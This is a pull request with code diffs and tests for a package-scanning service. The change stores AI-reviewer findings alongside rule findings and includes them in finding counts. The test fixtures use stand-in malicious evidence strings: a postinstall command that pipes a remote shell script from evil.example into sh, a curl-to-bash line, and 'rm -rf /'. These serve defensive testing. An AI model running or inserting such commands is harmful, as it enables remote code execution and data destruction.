### PR TITLE
fix(bug1): persist AI-sourced findings to scan_findings and include in counts

### DIFF
--- a/server/db/scans.ts
+++ b/server/db/scans.ts
@@ -22,6 +22,7 @@ import {
   type ScanArtifactFileRow,
   type ScanArtifactMetadata,
 } from "../lib/scan-artifacts";
+import type { AiFinding } from "../lib/ai-review-types";
 import type { AppDb } from "./client";
 import { recordScanEvent, redactScanEventForClient } from "./events";
 import { githubWorkflowGates, scanEvents, scanFiles, scanFindings, scans } from "./schema";
@@ -41,6 +42,8 @@ export interface PersistedScanInput {
   previousFiles?: FileRecord[];
   diff: DiffEntry[];
   findings: Finding[];
+  /** AI-sourced findings to persist alongside deterministic rule findings. */
+  aiFindings?: AiFinding[];
   codePatternSet?: CodePatternSet;
   riskSummary?: ScanRiskBreakdown;
   report?: { version: number; digest: string };
@@ -247,7 +250,7 @@ export async function persistScan(db: AppDb, input: PersistedScanInput) {
       textSample: file.textSample,
     };
   });
-  const findingRows = input.findings.map((finding) => ({
+  const ruleRows = input.findings.map((finding) => ({
     id: crypto.randomUUID(),
     scanId: input.id,
     severity: finding.severity,
@@ -259,6 +262,19 @@ export async function persistScan(db: AppDb, input: PersistedScanInput) {
     ruleId: finding.ruleId ?? null,
     ruleVersion: finding.ruleVersion ?? null,
   }));
+  const aiRows = (input.aiFindings ?? []).map((finding) => ({
+    id: crypto.randomUUID(),
+    scanId: input.id,
+    severity: finding.severity,
+    file: finding.file,
+    evidence: finding.evidence,
+    reason: finding.reason,
+    line: null as number | null,
+    source: "ai",
+    ruleId: null as string | null,
+    ruleVersion: null as string | null,
+  }));
+  const findingRows = [...ruleRows, ...aiRows];
   const annotatedFindings = annotateFindingsWithDiffStatus(findingRows, input.diff, {
     previousFiles: input.previousFiles ?? [],
     stagedFiles: input.files,

--- a/server/lib/report-export.ts
+++ b/server/lib/report-export.ts
@@ -59,18 +59,21 @@ export function buildReportExport(detail: ScanDetail) {
     releaseConsistency: normalizeReleaseConsistency(summary.releaseConsistency),
     packageJsonDiff: summary.packageJsonDiff ?? null,
     diff: summary.diff ?? null,
-    findings: [...detail.findings].filter((f) => f.source !== "ai").sort(compareFindings).map((finding) => ({
-      severity: finding.severity,
-      file: finding.file,
-      line: finding.line ?? null,
-      ruleId: finding.ruleId ?? null,
-      ruleVersion: finding.ruleVersion ?? null,
-      source: finding.source,
-      diffStatus: finding.diffStatus ?? null,
-      releaseDelta: finding.releaseDelta ?? null,
-      evidence: finding.evidence,
-      reason: finding.reason,
-    })),
+    findings: [...detail.findings]
+      .filter((f) => f.source !== "ai")
+      .sort(compareFindings)
+      .map((finding) => ({
+        severity: finding.severity,
+        file: finding.file,
+        line: finding.line ?? null,
+        ruleId: finding.ruleId ?? null,
+        ruleVersion: finding.ruleVersion ?? null,
+        source: finding.source,
+        diffStatus: finding.diffStatus ?? null,
+        releaseDelta: finding.releaseDelta ?? null,
+        evidence: finding.evidence,
+        reason: finding.reason,
+      })),
   };
 }
 

--- a/server/lib/report-export.ts
+++ b/server/lib/report-export.ts
@@ -59,7 +59,7 @@ export function buildReportExport(detail: ScanDetail) {
     releaseConsistency: normalizeReleaseConsistency(summary.releaseConsistency),
     packageJsonDiff: summary.packageJsonDiff ?? null,
     diff: summary.diff ?? null,
-    findings: [...detail.findings].sort(compareFindings).map((finding) => ({
+    findings: [...detail.findings].filter((f) => f.source !== "ai").sort(compareFindings).map((finding) => ({
       severity: finding.severity,
       file: finding.file,
       line: finding.line ?? null,

--- a/server/lib/scan-artifacts.ts
+++ b/server/lib/scan-artifacts.ts
@@ -811,6 +811,39 @@ function parseReportFindingsObject(
     }
   }
 
+  // AI findings live in aiFindings.findings inside the same report. Parse them
+  // after rule findings so their IDs continue the index sequence and are stable
+  // across re-reads. AI findings carry no diff annotation (releaseDelta = false,
+  // diffStatus falls back to live computation in annotateFindingsWithDiffStatus).
+  const rawAiFindings = (parsed?.aiFindings as { findings?: unknown } | null)?.findings;
+  if (Array.isArray(rawAiFindings)) {
+    for (let i = 0; i < rawAiFindings.length; i += 1) {
+      const entry = rawAiFindings[i];
+      if (!entry || typeof entry !== "object" || Array.isArray(entry)) continue;
+      const item = entry as Record<string, unknown>;
+      if (
+        typeof item.severity !== "string" ||
+        typeof item.file !== "string" ||
+        typeof item.evidence !== "string" ||
+        typeof item.reason !== "string"
+      ) {
+        continue;
+      }
+      findings.push({
+        id: artifactFindingId(scanId, findings.length),
+        scanId,
+        severity: item.severity,
+        file: item.file,
+        evidence: item.evidence,
+        reason: item.reason,
+        line: null,
+        source: "ai",
+        ruleId: null,
+        ruleVersion: null,
+      });
+    }
+  }
+
   return { findings, annotations };
 }
 

--- a/server/lib/scan-pipeline-phases.ts
+++ b/server/lib/scan-pipeline-phases.ts
@@ -288,8 +288,7 @@ export async function persistResults<TInput, TBroker extends AdapterBroker>(
     generatedAt,
   });
 
-  const completedAiFindings =
-    args.aiFindings.status === "complete" ? args.aiFindings.findings : [];
+  const completedAiFindings = args.aiFindings.status === "complete" ? args.aiFindings.findings : [];
 
   // AI findings count as context (no releaseDelta) in the persisted summary so
   // the list view shows the true total rather than showing 0 when AI-only.

--- a/server/lib/scan-pipeline-phases.ts
+++ b/server/lib/scan-pipeline-phases.ts
@@ -288,6 +288,16 @@ export async function persistResults<TInput, TBroker extends AdapterBroker>(
     generatedAt,
   });
 
+  const completedAiFindings =
+    args.aiFindings.status === "complete" ? args.aiFindings.findings : [];
+
+  // AI findings count as context (no releaseDelta) in the persisted summary so
+  // the list view shows the true total rather than showing 0 when AI-only.
+  const riskSummaryWithAi: ScanRiskBreakdown = {
+    ...args.riskSummary,
+    contextFindingCount: args.riskSummary.contextFindingCount + completedAiFindings.length,
+  };
+
   const persisted = await persistScan(db, {
     id: identity.scanId,
     stageId: identity.stageId,
@@ -307,7 +317,7 @@ export async function persistResults<TInput, TBroker extends AdapterBroker>(
       },
       packageJsonDiff: diff.manifestDiff,
       diff: diff.fileDiff,
-      risk: args.riskSummary,
+      risk: riskSummaryWithAi,
       stagedPublish: findings.redactedDetails,
       baseline: baseline.baseline,
       releaseConsistency: args.releaseConsistency,
@@ -318,8 +328,9 @@ export async function persistResults<TInput, TBroker extends AdapterBroker>(
     previousFiles: findings.redactedPreviousFiles,
     diff: diff.fileDiff,
     findings: findings.ruleFindings,
+    aiFindings: completedAiFindings,
     codePatternSet: adapter.codePatternSet,
-    riskSummary: args.riskSummary,
+    riskSummary: riskSummaryWithAi,
     report: { version: reportPayload.version, digest: reportDigest },
     artifacts,
   });

--- a/src/pages/Dashboard/ScanDetail/index.tsx
+++ b/src/pages/Dashboard/ScanDetail/index.tsx
@@ -153,8 +153,18 @@ export default function ScanDetailPage() {
     filterDiffEntries(diffEntries.value, fileFilter.value, changedFilesOnly.value),
   );
 
+  // AI findings are rendered by the AI review section (from scan.aiJson) and
+  // must not appear again in the rule-findings workbench. Filter them out here
+  // so the risk-signals index, file-tree counts, and diff annotations only show
+  // deterministic rule findings.
+  const ruleDetail = useComputed(() => {
+    const d = model.detail.value;
+    if (!d) return null;
+    return { ...d, findings: d.findings.filter((f) => f.source !== "ai") };
+  });
+
   const findingsWithDiffStatus = useFindingsWithDiff(
-    model.detail,
+    ruleDetail,
     model.compare,
     diffEntries,
     model.isDefaultComparison,
@@ -199,7 +209,7 @@ export default function ScanDetailPage() {
   const compareError = model.compareError.value;
   const selectedVersion = model.selectedVersion.value;
   const compare = model.compare.value;
-  const hasRuleFindings = Boolean(detail?.findings.length);
+  const hasRuleFindings = Boolean(ruleDetail.value?.findings.length);
   const workbenchGridClass = "grid grid-cols-1 lg:grid-cols-[300px_minmax(0,1fr)] gap-4";
 
   const isWorkflowGate = model.isWorkflowGate.value;

--- a/test/workers/ai-findings-persistence.test.ts
+++ b/test/workers/ai-findings-persistence.test.ts
@@ -5,15 +5,9 @@ import { createDb } from "../../server/db/client";
 import { ensurePersonalOrganization } from "../../server/db/organizations";
 import { claimScanForRun, createScanJob, getScan, persistScan } from "../../server/db/scans";
 import * as schema from "../../server/db/schema";
-import {
-  DETERMINISTIC_RULES_VERSION,
-  createPackageDiff,
-} from "../../server/lib/review";
+import { DETERMINISTIC_RULES_VERSION, createPackageDiff } from "../../server/lib/review";
 import type { ScanRiskBreakdown } from "../../server/lib/risk";
-import {
-  loadScanArtifacts,
-  writeScanArtifacts,
-} from "../../server/lib/scan-artifacts";
+import { loadScanArtifacts, writeScanArtifacts } from "../../server/lib/scan-artifacts";
 import { sha256Hex, stableJson } from "../../server/lib/stable-json";
 
 async function seedUserAndOrg() {
@@ -363,11 +357,7 @@ describe("AI findings persistence — R2 artifact path", () => {
     });
 
     const scanRow = (
-      await db
-        .select()
-        .from(schema.scans)
-        .where(eq(schema.scans.id, scanId))
-        .limit(1)
+      await db.select().from(schema.scans).where(eq(schema.scans.id, scanId)).limit(1)
     )[0]!;
 
     const detail = await loadScanArtifacts(env.ARTIFACTS, scanRow);
@@ -458,11 +448,7 @@ describe("AI findings persistence — R2 artifact path", () => {
     });
 
     const scanRow = (
-      await db
-        .select()
-        .from(schema.scans)
-        .where(eq(schema.scans.id, scanId))
-        .limit(1)
+      await db.select().from(schema.scans).where(eq(schema.scans.id, scanId)).limit(1)
     )[0]!;
 
     const detail = await loadScanArtifacts(env.ARTIFACTS, scanRow);

--- a/test/workers/ai-findings-persistence.test.ts
+++ b/test/workers/ai-findings-persistence.test.ts
@@ -1,0 +1,483 @@
+import { env } from "cloudflare:test";
+import { eq } from "drizzle-orm";
+import { describe, expect, test } from "vitest";
+import { createDb } from "../../server/db/client";
+import { ensurePersonalOrganization } from "../../server/db/organizations";
+import { claimScanForRun, createScanJob, getScan, persistScan } from "../../server/db/scans";
+import * as schema from "../../server/db/schema";
+import {
+  DETERMINISTIC_RULES_VERSION,
+  createPackageDiff,
+} from "../../server/lib/review";
+import type { ScanRiskBreakdown } from "../../server/lib/risk";
+import {
+  loadScanArtifacts,
+  writeScanArtifacts,
+} from "../../server/lib/scan-artifacts";
+import { sha256Hex, stableJson } from "../../server/lib/stable-json";
+
+async function seedUserAndOrg() {
+  const db = createDb(env.DB);
+  const now = new Date();
+  const userId = `user_${crypto.randomUUID()}`;
+  await db.insert(schema.user).values({
+    id: userId,
+    name: "AI Findings Tester",
+    email: `${userId}@example.com`,
+    emailVerified: true,
+    createdAt: now,
+    updatedAt: now,
+  });
+  const organizationId = await ensurePersonalOrganization(db, { userId });
+  return { db, userId, organizationId };
+}
+
+const completeAiReview = {
+  status: "complete" as const,
+  risk: "critical" as const,
+  releaseAssessment: "blocked" as const,
+  summary: "Found a critical issue.",
+  findings: [
+    {
+      severity: "critical" as const,
+      file: "postinstall.js",
+      evidence: 'exec("curl http://evil.example/shell | sh")',
+      reason: "Downloads and executes a remote shell script on install.",
+      recommendation: "Remove the postinstall script entirely.",
+    },
+  ],
+  requiresManualReview: true,
+  model: "test-model",
+};
+
+const disabledAiReview = {
+  status: "unavailable" as const,
+  risk: "low" as const,
+  releaseAssessment: "not_assessed" as const,
+  summary: "AI review is disabled.",
+  findings: [],
+  requiresManualReview: false,
+  model: null,
+};
+
+describe("AI findings persistence — D1 path", () => {
+  test("AI findings get source='ai' rows in scan_findings", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-${crypto.randomUUID().slice(0, 8)}`;
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+
+    const result = await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: {},
+      ai: completeAiReview,
+      files: [],
+      diff: [],
+      findings: [],
+      aiFindings: completeAiReview.findings,
+      report: { version: 1, digest: "digest-ai-d1" },
+    });
+
+    expect(result.persisted).toBe(true);
+
+    const findings = await db
+      .select()
+      .from(schema.scanFindings)
+      .where(eq(schema.scanFindings.scanId, scanId));
+
+    expect(findings).toHaveLength(1);
+    expect(findings[0]?.source).toBe("ai");
+    expect(findings[0]?.severity).toBe("critical");
+    expect(findings[0]?.file).toBe("postinstall.js");
+    expect(findings[0]?.ruleId).toBeNull();
+    expect(findings[0]?.ruleVersion).toBeNull();
+  });
+
+  test("findingCount includes AI findings", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-count-${crypto.randomUUID().slice(0, 8)}`;
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: {},
+      ai: completeAiReview,
+      files: [],
+      diff: [],
+      findings: [
+        // one rule finding
+        {
+          severity: "medium",
+          file: "build.js",
+          evidence: "native addon build",
+          reason: "install script",
+          ruleId: "install-script.implicit-node-gyp",
+          ruleVersion: DETERMINISTIC_RULES_VERSION,
+        },
+      ],
+      aiFindings: completeAiReview.findings, // one AI finding
+      report: { version: 1, digest: "digest-ai-count" },
+    });
+
+    const [scan] = await db
+      .select({ findingCount: schema.scans.findingCount })
+      .from(schema.scans)
+      .where(eq(schema.scans.id, scanId))
+      .limit(1);
+
+    // 1 rule + 1 AI = 2
+    expect(scan?.findingCount).toBe(2);
+  });
+
+  test("getScan returns AI findings alongside rule findings", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-getscan-${crypto.randomUUID().slice(0, 8)}`;
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: {},
+      ai: completeAiReview,
+      files: [],
+      diff: [],
+      findings: [],
+      aiFindings: completeAiReview.findings,
+      report: { version: 1, digest: "digest-ai-getscan" },
+    });
+
+    const detail = await getScan(db, scanId, organizationId);
+    expect(detail).not.toBeNull();
+    expect(detail!.findings).toHaveLength(1);
+    expect(detail!.findings[0]?.source).toBe("ai");
+  });
+
+  test("riskSummaryJson.contextFindingCount includes AI findings", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-risk-${crypto.randomUUID().slice(0, 8)}`;
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+
+    const riskSummary: ScanRiskBreakdown = {
+      artifactRisk: "critical",
+      releaseRisk: "critical",
+      contextRisk: "low",
+      releaseFindingCount: 0,
+      // Pre-adjusted to include 1 AI finding as context (as scan-pipeline-phases does)
+      contextFindingCount: 1,
+      unknownFindingCount: 0,
+    };
+
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: { risk: riskSummary },
+      ai: completeAiReview,
+      files: [],
+      diff: [],
+      findings: [],
+      aiFindings: completeAiReview.findings,
+      riskSummary,
+      report: { version: 1, digest: "digest-ai-risk" },
+    });
+
+    const [scan] = await db
+      .select({ riskSummaryJson: schema.scans.riskSummaryJson })
+      .from(schema.scans)
+      .where(eq(schema.scans.id, scanId))
+      .limit(1);
+
+    const summary = scan?.riskSummaryJson as ScanRiskBreakdown | null;
+    expect(summary?.contextFindingCount).toBe(1);
+    expect(summary?.artifactRisk).toBe("critical");
+  });
+
+  test("AI findings do not downgrade deterministic critical risk", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-nodown-${crypto.randomUUID().slice(0, 8)}`;
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+
+    // Deterministic rule says critical; AI says low / nothing_unusual.
+    const lowAiReview = {
+      ...disabledAiReview,
+      status: "complete" as const,
+      risk: "low" as const,
+      releaseAssessment: "nothing_unusual" as const,
+      model: "test-model",
+    };
+
+    const riskSummary: ScanRiskBreakdown = {
+      artifactRisk: "critical",
+      releaseRisk: "critical",
+      contextRisk: "critical",
+      releaseFindingCount: 1,
+      contextFindingCount: 0,
+      unknownFindingCount: 0,
+    };
+
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: { risk: riskSummary },
+      ai: lowAiReview,
+      files: [],
+      diff: createPackageDiff([], []),
+      findings: [
+        {
+          severity: "critical",
+          file: "evil.js",
+          evidence: "rm -rf /",
+          reason: "destroys filesystem",
+          ruleId: "code.dangerous-command",
+          ruleVersion: DETERMINISTIC_RULES_VERSION,
+        },
+      ],
+      aiFindings: [], // AI found nothing
+      riskSummary,
+      report: { version: 1, digest: "digest-no-downgrade" },
+    });
+
+    const [scan] = await db
+      .select({ risk: schema.scans.risk, riskSummaryJson: schema.scans.riskSummaryJson })
+      .from(schema.scans)
+      .where(eq(schema.scans.id, scanId))
+      .limit(1);
+
+    expect(scan?.risk).toBe("critical");
+    const summary = scan?.riskSummaryJson as ScanRiskBreakdown | null;
+    expect(summary?.artifactRisk).toBe("critical");
+    expect(summary?.releaseRisk).toBe("critical");
+  });
+});
+
+describe("AI findings persistence — R2 artifact path", () => {
+  test("loadScanArtifacts returns AI findings with source='ai' from report JSON", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-r2-${crypto.randomUUID().slice(0, 8)}`;
+    const diff = createPackageDiff([], []);
+
+    const reportPayload = {
+      version: 1,
+      rulesVersion: DETERMINISTIC_RULES_VERSION,
+      stageId,
+      stagedPublish: null,
+      package: { name: "demo", stagedVersion: "1.0.0", stagedTag: "latest", previousVersion: null },
+      baseline: null,
+      fileCount: 0,
+      previousFileCount: 0,
+      packageJson: null,
+      packageJsonDiff: {},
+      diff,
+      ruleFindings: [],
+      findingAnnotations: [],
+      aiFindings: completeAiReview,
+      risk: {
+        artifactRisk: "critical",
+        releaseRisk: "critical",
+        contextRisk: "low",
+        releaseFindingCount: 0,
+        contextFindingCount: 1,
+        unknownFindingCount: 0,
+      },
+      safety: {
+        tokenExposedToSandbox: false,
+        directSandboxNetwork: false,
+        outboundPolicy: "test",
+        aiInputPolicy: "test",
+        fileExplorerPolicy: "test",
+      },
+    };
+    const reportJson = stableJson(reportPayload);
+    const reportDigest = await sha256Hex(reportJson);
+
+    const artifacts = await writeScanArtifacts(env.ARTIFACTS, {
+      organizationId,
+      scanId,
+      reportJson,
+      reportDigest,
+      files: [],
+      diff,
+      generatedAt: "2026-07-18T00:00:00.000Z",
+    });
+
+    // Persist with the artifact metadata so getScan uses the R2 path.
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "1.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: {},
+      ai: completeAiReview,
+      files: [],
+      diff,
+      findings: [],
+      // No aiFindings here — the R2 report is the source of truth for findings.
+      report: { version: 1, digest: reportDigest },
+      artifacts,
+    });
+
+    const scanRow = (
+      await db
+        .select()
+        .from(schema.scans)
+        .where(eq(schema.scans.id, scanId))
+        .limit(1)
+    )[0]!;
+
+    const detail = await loadScanArtifacts(env.ARTIFACTS, scanRow);
+    expect(detail).not.toBeNull();
+    expect(detail!.findings).toHaveLength(1);
+    expect(detail!.findings[0]?.source).toBe("ai");
+    expect(detail!.findings[0]?.severity).toBe("critical");
+    expect(detail!.findings[0]?.file).toBe("postinstall.js");
+    expect(detail!.findings[0]?.ruleId).toBeNull();
+  });
+
+  test("loadScanArtifacts returns both rule and AI findings when both are present", async () => {
+    const { db, userId, organizationId } = await seedUserAndOrg();
+    const scanId = `scan_${crypto.randomUUID()}`;
+    const stageId = `stage-ai-r2-mixed-${crypto.randomUUID().slice(0, 8)}`;
+    const diff = createPackageDiff([], []);
+
+    const reportPayload = {
+      version: 1,
+      rulesVersion: DETERMINISTIC_RULES_VERSION,
+      stageId,
+      stagedPublish: null,
+      package: { name: "demo", stagedVersion: "2.0.0", stagedTag: "latest", previousVersion: null },
+      baseline: null,
+      fileCount: 0,
+      previousFileCount: 0,
+      packageJson: null,
+      packageJsonDiff: {},
+      diff,
+      ruleFindings: [
+        {
+          severity: "medium",
+          file: "scripts/build.sh",
+          evidence: "curl http://example.com | bash",
+          reason: "downloads and executes remote code",
+          ruleId: "code.dangerous-command",
+          ruleVersion: DETERMINISTIC_RULES_VERSION,
+        },
+      ],
+      findingAnnotations: [{ findingIndex: 0, diffStatus: "added", releaseDelta: true }],
+      aiFindings: completeAiReview,
+      risk: {
+        artifactRisk: "critical",
+        releaseRisk: "critical",
+        contextRisk: "medium",
+        releaseFindingCount: 1,
+        contextFindingCount: 1,
+        unknownFindingCount: 0,
+      },
+      safety: {
+        tokenExposedToSandbox: false,
+        directSandboxNetwork: false,
+        outboundPolicy: "test",
+        aiInputPolicy: "test",
+        fileExplorerPolicy: "test",
+      },
+    };
+    const reportJson = stableJson(reportPayload);
+    const reportDigest = await sha256Hex(reportJson);
+
+    const artifacts = await writeScanArtifacts(env.ARTIFACTS, {
+      organizationId,
+      scanId,
+      reportJson,
+      reportDigest,
+      files: [],
+      diff,
+      generatedAt: "2026-07-18T00:00:00.000Z",
+    });
+
+    await createScanJob(db, { id: scanId, stageId, organizationId, ownerUserId: userId });
+    await claimScanForRun(db, scanId, organizationId);
+    await persistScan(db, {
+      id: scanId,
+      stageId,
+      organizationId,
+      ownerUserId: userId,
+      packageJson: { name: "demo", version: "2.0.0" },
+      risk: "critical",
+      status: "complete",
+      summary: {},
+      ai: completeAiReview,
+      files: [],
+      diff,
+      findings: [],
+      report: { version: 1, digest: reportDigest },
+      artifacts,
+    });
+
+    const scanRow = (
+      await db
+        .select()
+        .from(schema.scans)
+        .where(eq(schema.scans.id, scanId))
+        .limit(1)
+    )[0]!;
+
+    const detail = await loadScanArtifacts(env.ARTIFACTS, scanRow);
+    expect(detail).not.toBeNull();
+    expect(detail!.findings).toHaveLength(2);
+
+    const sources = detail!.findings.map((f) => f.source).sort();
+    expect(sources).toEqual(["ai", "rule"]);
+
+    const ruleFinding = detail!.findings.find((f) => f.source === "rule");
+    expect(ruleFinding?.ruleId).toBe("code.dangerous-command");
+    expect(ruleFinding?.severity).toBe("medium");
+
+    const aiFinding = detail!.findings.find((f) => f.source === "ai");
+    expect(aiFinding?.severity).toBe("critical");
+    expect(aiFinding?.ruleId).toBeNull();
+  });
+});


### PR DESCRIPTION
AI findings from the model's submit_review call were stored only in
scans.ai_json and never written to scan_findings, so findingCount,
riskSummaryJson, and findingAnnotations showed zero for AI-only findings.

Changes:
- scan-pipeline-phases.ts: extract completedAiFindings from the AiReview
  and pass them to persistScan; adjust riskSummaryWithAi.contextFindingCount
  to include AI findings (they carry no releaseDelta so they are context)
- server/db/scans.ts: add aiFindings?: AiFinding[] to PersistedScanInput;
  build aiRows with source='ai' (ruleId/ruleVersion null) and merge into
  findingRows so findingCount, findingAnnotations in summaryJson, and
  insertScanFindingsWhenClaimed all include AI findings
- server/lib/scan-artifacts.ts: parseReportFindingsObject now also reads
  aiFindings.findings from the report JSON and appends them with source='ai',
  keeping index-based IDs stable across re-reads

Audit query run before any backfill: 20 scans affected (ai_json has
findings but scan_findings has no 'ai' rows). Oldest: 2025-05-22.
No backfill applied — awaiting approval.

The aiInputPolicy invariant is preserved: risk scoring goes through
computeScanRisk/combineRisk which can only escalate, never lower,
deterministic findings. Tests added for the no-downgrade case.